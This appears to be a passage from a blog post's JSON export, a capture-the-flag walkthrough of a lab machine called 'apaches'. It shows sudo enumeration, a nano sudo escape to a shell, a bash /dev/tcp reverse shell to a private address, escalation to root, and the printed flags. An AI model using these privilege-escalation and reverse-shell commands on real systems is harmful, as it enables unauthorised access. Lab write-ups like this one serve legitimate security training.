*#%%%(\/%\/(\/(\/((\/\/(#*(\/\/\/\/\/((\/%@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@@@@@(%%*%#(\/(%(\/\/\/\/\/\/(%%%%(\/\/\/(*%&amp;#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@@@@%%%%#(\
/(\/((#\/\/(\/\/\/\/*%\/%#(\/##%%\/@\/@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@@@@(%%%#(*#(((*(\/\/\/(\/(,*,@&amp;%###\/(&amp;\/(@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@@@@@%@#\/\/@%%(\/\/\/\/\/(\/*\/\/*,\/%%#((#%\/%&amp;@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@@@@@%@@@@&amp;%%%#%%%%*#*%&amp;\/%&amp;@#@&amp;@\/(%%\/\/@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@@@@@&amp;@@@&amp;%%%%%%%\/%%&amp;%&amp;#,&amp;*@(\/\/(%#%\/&amp;%@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@@@@(\/@@&amp;&amp;%%%%\/\/&amp;@@,*,@,*#@@@@(((\/(%%&amp;(@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@@@@\/((%#\/((*%%&amp;@@&amp;\/,,@#\/@@@@@@%@@&amp;%%%&amp;**@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@@@%\/&amp;&amp;@&amp;%%%%%(@@,@@\/&amp;#@@@@@@@@@(%#((@#\/&amp;&amp;(@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@@@%%%%#(\/((((@,*@@@@@@@@@@@@@@@#@@@%%%&amp;%&amp;(@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@@@#@&amp;\/\/\/%#*(\/@&amp;#\/@@@@@@@@@@@@@@#@@@%%%%\/&amp;@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@@&amp;%%(\/%*\/%%(@&amp;@@@@@@@@@@@@@@@@@&amp;@@@%#%#%(@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@@\/\/#&amp;%#%%%(@@@@@@@*@@@@@@@@@@@@@@@@%%%(%@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@#@@&amp;%%#%%&amp;@@@@@@@\/,@@@@@@@@@@@@@@&amp;%%%#((@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@&amp;@#\/\/\/#%%(@@@@@@&amp;@@@@@@@@@@@@@%@%####\/%(@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@#%*&amp;&amp;##*\/(@@@@@@@@@@@@@@@@@@@%&amp;&amp;##((\/\/&amp;%(@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@\/@@@@###%(@@@@@@@@@@@@@@@@@@@########%%%@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@&amp;@@@@@%#%#%@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@%@@@@@%%##%(@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@#@@@@@%##%%%\/@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@#@@@@%#%####%(@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@%@@@%#@%###%%%(@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@%&amp;%#%%%%%%%%%#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@@@@#(((%@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n\nYou are on fire, keep going!\npocahontas@apaches:~$ sudo -l\n[sudo] password for pocahontas: \nMatching Defaults entries for pocahontas on apaches:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\n\nUser pocahontas may run the following commands on apaches:\n    (geronimo) \/bin\/nano<\/code><\/pre>\n<h3>nano privilege escalation<\/h3>\n<p><a href=\"https:\/\/gtfobins.github.io\/gtfobins\/nano\/#sudo\">https:\/\/gtfobins.github.io\/gtfobins\/nano\/#sudo<\/a><\/p>\n<pre><code class=\"language-bash\">sudo nano\n^R^X\nreset; sh 1&gt;&amp;0 2&gt;&amp;0<\/code><\/pre>\n<pre><code class=\"language-bash\">sudo -u geronimo \/bin\/nano\nctrl + r,ctrl + x\nreset; sh 1&gt;&amp;0 2&gt;&amp;0<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404201410318.png\" alt=\"image-20240420140214334\" \/><\/p>\n<h4>Information gathering<\/h4>\n<pre><code class=\"language-bash\">$ sudo -l\nMatching Defaults entries for geronimo on apaches:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\n\nUser geronimo may run the following commands on apaches:\n    (ALL : ALL) ALL\n    (ALL) NOPASSWD: ALL<\/code><\/pre>\n<p>Then we enter <code>bash -c &#039;exec bash -i &amp;&gt;\/dev\/tcp\/192.168.0.143\/1234 &lt;&amp;1&#039;<\/code> to bounce a shell back:<\/p>\n<pre><code class=\"language-bash\">(remote) geronimo@apaches:\/home\/geronimo$ ls -la\ntotal 32\ndrwxr-xr-x 4 geronimo geronimo 4096 Jul 13  2023 .\ndrwxr-xr-x 6 root     root     4096 Oct  9  2022 ..\n-rw------- 1 geronimo geronimo    0 Jul 13  2023 .bash_history\n-rw-r--r-- 1 geronimo geronimo  220 Feb 25  2020 .bash_logout\n-rw-r--r-- 1 geronimo geronimo 3771 Feb 25  2020 .bashrc\ndrwx------ 2 geronimo geronimo 4096 Sep 30  2022 .cache\ndrwxrwxr-x 3 geronimo geronimo 4096 Oct 10  2022 .local\n-rw-r--r-- 1 geronimo geronimo  807 Feb 25  2020 .profile\n-rw-r--r-- 1 geronimo geronimo    0 Oct  1  2022 .sudo_as_admin_successful\n-rw------- 1 geronimo geronimo 3827 Oct 10  2022 user.txt\n(remote) geronimo@apaches:\/home\/geronimo$ cat user.txt \n\n  _____ _                      __                              _                 \n |  ___| | __ _  __ _    ___  \/ _|   __ _  ___ _ __ ___  _ __ (_)_ __ ___   ___  \n | |_  | |\/ _` |\/ _` |  \/ _ \\| |_   \/ _` |\/ _ \\ &#039;__\/ _ \\| &#039;_ \\| | &#039;_ ` _ \\ \/ _ \\ \n |  _| | | (_| | (_| | | (_) |  _| | (_| |  __\/ | | (_) | | | | | | | | | | (_) |\n |_|   |_|\\__,_|\\__, |  \\___\/|_|    \\__, 
|\\___|_|  \\___\/|_| |_|_|_| |_| |_|\\___\/ \n                |___\/               |___\/                                        \n\n%&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;%&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;%%%&amp;&amp;&amp;&amp;%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%###(((\/\/\/\/\/\/\n&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;%%%%%%&amp;%%%%%%%%&amp;%%#(%%%%%%%%%%%%%%%%%%%%%%%##((((((\/\/\/\n%&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;%%%%%##%%%%%%%%(\/**(%%#%%%%%%%%%%%%%%%%%%%%%%##(((((((\/\/\n&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;%%%%%%%%#*,\/%%%%((((\/%%%%*,\/%%%%%%%%%%%%%%%%%%%##((((((\/**\n&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;%%%(%%\/\/\/\/*%%#((##((%%#*\/,,,#%%%%%%%%%%%%%%%%%#####((((\/\/\n&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;%&amp;%%%%#(%\/*\/\/\/*#(\/((#(((%#*\/,,,,#*,,(%%%%%%%%%%%%%%####((((((\n%&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;%&amp;%%%%%%(%(##,,**\/**#(((#%\/(%*\/*,,.,*\/,.,%%%%%%%%%%#(%%####((((\/\/\n%&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;%%%&amp;%%(#\/(#\/,***\/**(#((((\/%*\/*.,,.,\/,..\/%%%%%%############(((\/(\/\n%&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&
amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;%((((\/(#,***(*,(#((#(*,**...,,*,...%%.,,.#####%####%###(((\/(\n%&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;%&amp;#((#\/&amp;#(\/((#**\/##(%\/,,*....,,...,\/..,...#%%%%###%#%%###((((\n%&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;%##((#(%#%%((%\/\/\/##((\/*\/*..,,,,...,**,.......(#####%#%%###(((\n&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;%#\/#%(##%%#&amp;#%\/\/\/%#%(\/\/,..,,,..*,.,,....,......,(##%%%%%##(((\n%&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;%%%((((%%(&amp;%%&amp;&amp;&amp;(%#%%%#%\/#*#(\/..........,.......#%%#########(((\n&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;%%%\/#\/#%%%%&amp;&amp;&amp;%&amp;%%#%%%#%#*(#%(,#*.............\/#*\/##%#%%##(##((\n&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;%&amp;&amp;&amp;%%%#\/##%%&amp;&amp;&amp;%%%%%(\/*#.*\/,.,.#*(%\/,,#...........(%%%%#####((((((\n%&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;%%%(\/#&amp;&amp;%%\/,(\/\/,(*,\/,\/(.,,\/..,*\/(#(..#......\/#%%%#######((((((\n%&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;#*(%%&amp;%,#\/*((,(\/\/,\/\/***(..*..,,#*#(((*..((.,%%%%###(((((((((\n%&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&a
mp;&amp;&amp;&amp;%%(%&amp;(%\/#\/,%%%%%%%%%#%#(#\/*,..#.,*\/\/\/....*###(#######((((((#\n%&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;%%%%%%%%\/(%%%%..\/###((*#\/.....,,,..\/(***.((##((((((###(((((((((\n%%&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;%&amp;&amp;%%%%%%%#..*,((,\/....\/..........**(\/\/,.\/##%%#####((\/(((\/\/((###\n%%&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;%%%&amp;%%%%%%\/,.,,##(%#,,,(#,.,...,...,**\/\/\/*(###%%##(((((((\/\/*\/(#((\n#%%%%&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;%&amp;%%%%%%%%%(,..,,(%%((#%%%#,..,\/*,....,.......(#######(((\/\/\/\/((##((\n%%%%%%%&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;%%%%%%%%%#(..*..,,,\/*..,\/*....,.....,,\/##\/,..\/####((((((\/\/\/\/\/((##(\n%%%%%%%%%%&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;%%%%&amp;%%%%%%%%##.....**(\/*(#(\/,..........,*,(%%######(((\/\/\/((\/\/\/\/((##(\/\n%%%%%%%%%&amp;%&amp;&amp;%&amp;&amp;&amp;&amp;%&amp;&amp;&amp;%%%%%%%%%%%%#,..\/\/,\/\/(*##((*..........\/,#\/(%%%#%##\/\/\/\/\/\/\/\/\/\/\/((##((\/\n%%%%%%%%&amp;%&amp;&amp;&amp;&amp;&amp;%&amp;&amp;%&amp;&amp;%&amp;%%%%%%%%%##,#......*,*\/((\/,.........,(,.(\/##%%%#((\/\/*\/\/\/\/\/\/\/((##(\/\/\n%%%%%%%%%&amp;&amp;&amp;&amp;%%%&amp;&amp;&amp;%%%%%%%%%%%%#(\/(%**((....*(.............*#*,\/((#####(\/\/\/\/\/\/\/\/\/((####(\/\/\n%%%%%%%%%%%%%%&amp;%%&amp;&amp;&amp;%%%#%(#%%%#(((#%\/.\/..,.#\/.(\/(..,*,.....(#\/...,,*((#((\/\/*\/\/\/\/\/((###(\/\/\/\n#%%%%%%%%%%%%&amp;&amp;%%%%%*%%#&amp;*#%%%(\/\/#%%...#,,*\/**,,,...(((,..,#\/(.,,**\/\/*\/,\/\/\/\/\/\/\/\/\/((###(\/\/\/\n(#%%%%%%%%%%%%%%%%%&amp;(*#((\/(((\/*,#%%#.,.,,%\/\/((%#\/,......,#%#((.,*\/\/\/(\/\/((\/\/\/\/\/\/\/\/(((((\/\/\/(\n(##%#%%%%%%%%%%##%%%%\/,%(
\/,(*,,,%%#%#..,**\/((\/(*,,...,,,,,,(#(,,**(((((((\/((\/\/\/\/((((((\/*((\n*(#%##%%%%%%%%%##%((%(.*%**\/(..(%%%%#..,*(\/\/(\/*,,,...,.,,,*%(((***\/(((#%(,(\/##(((((((\/\/\/\/(\n\/(###%%%%%%%%%###*#%%#(\/#,#,,((%%%%%#\/..*\/\/\/\/\/*,*,..,,,,,**####\/*\/(((%##(*(#%,((\/((\/\/\/\/\/(#\n\/(##%%#%%%%%%#%,(%%%##(,\/\/,*(*\/%&amp;%%\/%#..*\/**\/\/*,*,,,,,,,,,\/(%%%\/\/((%,\/%%%\/,,\/#(((\/(\/\/\/\/#((\n*#(#(#####%#%#\/*%%%%(**(\/*(*((%&amp;%%%%%#.,*(\/***,,**,\/,,,**(\/*\/(#*%\/*,%%(((\/\/(%#%#%(\/\/\/\/(#((\n*##((#######%(*####.*(\/\/\/,(*\/,&amp;%%%%%%#.,,,**%,***%\/,,\/.**,*#%%(%(*\/,*,\/%#,(%%%%%((\/\/\/((#((\n\nAs long as you keep going, you&#039;ll keep getting better.<\/code><\/pre>\n<p>We are already in the sudo group and have root privileges!<\/p>\n<pre><code class=\"language-bash\">(remote) geronimo@apaches:\/home\/geronimo$ sudo su\nroot@apaches:\/home\/geronimo# cd \/root\nroot@apaches:~# ls -la\ntotal 40\ndrwx------  5 root root 4096 Jul 13  2023 .\ndrwxr-xr-x 20 root root 4096 Sep 30  2022 ..\n-rw-------  1 root root    0 Jul 13  2023 .bash_history\n-rw-r--r--  1 root root 3106 Dec  5  2019 .bashrc\ndrwxr-xr-x  3 root root 4096 Oct  1  2022 .local\n-rw-r--r--  1 root root  161 Dec  5  2019 .profile\n-rw-rw----  1 root root 3675 Jul 13  2023 root.txt\n-rw-r--r--  1 root root   66 Oct 10  2022 .selected_editor\ndrwxr-xr-x  3 root root 4096 Sep 30  2022 snap\ndrwx------  2 root root 4096 Sep 30  2022 .ssh\n-rw-r--r--  1 root root  173 Oct  1  2022 .wget-hsts\nroot@apaches:~# cat root.txt \n\n         \u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557  \u2588\u2588\u2588\u2588\u2588\u2557  \u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2557  \u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\n        
\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2551  \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\n        \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2551     \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2557  \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\n        \u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2550\u255d \u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2551     \u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u255d  \u255a\u2550\u2550\u2550\u2550\u2588\u2588\u2551\n        \u2588\u2588\u2551  \u2588\u2588\u2551\u2588\u2588\u2551     \u2588\u2588\u2551  \u2588\u2588\u2551\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2551  \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\n        \u255a\u2550\u255d  \u255a\u2550\u255d\u255a\u2550\u255d     \u255a\u2550\u255d  \u255a\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u255d  \u255a\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\n\n            ............                                                        \n                 ........,,,,,,,                                                \n                      ....,,,,.......                                           \n                            .............                                       \n                                 ............                                   \n     .................,,,,,,,,....     ........                   
              \n                , ,,,,,,,,,,,,............ .......                              \n                                     .........  ....                            \n                                    ..................                          \n                                ,,....................                          \n                              *,,,,,,,,,,,,,,,,,,,,,,.                          \n                             ***,,,,,,,,,,,,,,,,,,,,,.........                  \n                            *****,,,,,,,,,,,,,,,,,,,.......,,,,,                \n                           \/\/\/\/\/**,,,,,,,,,,,,,,,,,,......,,,,,,.               \n                           \/\/\/\/\/\/\/\/,******,,,,,,,,,......,,,,,,,,               \n                          \/\/\/\/\/\/\/\/\/\/\/*************.,,,,,,,,,,,,,                \n                          \/\/\/\/\/\/\/\/\/\/\/\/*********,,,....,,,,,,,,,,,               \n                           \/\/\/\/\/\/\/\/\/\/\/\/\/***,,,,,,........,,,,,,....             \n                          .\/\/\/\/\/******,,,,,,,,,,.....,......,,......            \n                          **********,,,,,,,,,,,,...,,,,.....,,........          \n                          *******,,,,,,,,,,,,,,..,,,,,,,.,,,,,,,.               \n                         ******,,,,,,,,,,,,,,,,,........,,,,,,,,,               \n                        ,****,,,,,,,,,,,,,,,,,,,,.......,,,,..,,,               \n                       ***,,,,,,,,,,,,,,,,,,,,,,,,.....,,......                 \n                     ***,...,,,,,,,,,,,,,,,,,,,,,,,.............                \n                        ((,,,,,,,,,,,,,,,,,,,,,,,,,.                            \n                      *((((((((,,,,,,,,,,,,,,,,,,,,                             \n                                       ,,,,,,,,,,,                              \n                                          \/,,,,..                               
\n                                              ,...                              \n                                                 ,.                             \n\n                Awesome, you have captured the root flag!!!!!\n\nFlag: OneSingleVulnerabilityAllAnAttackerNeeds<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Apache Information gathering Port scanning rustscan -a 192.168.0.160 &#8212; -A Open 1 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-592","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/592","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=592"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/592\/revisions"}],"predecessor-version":[{"id":593,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/592\/revisions\/593"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=592"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=592"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=592"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}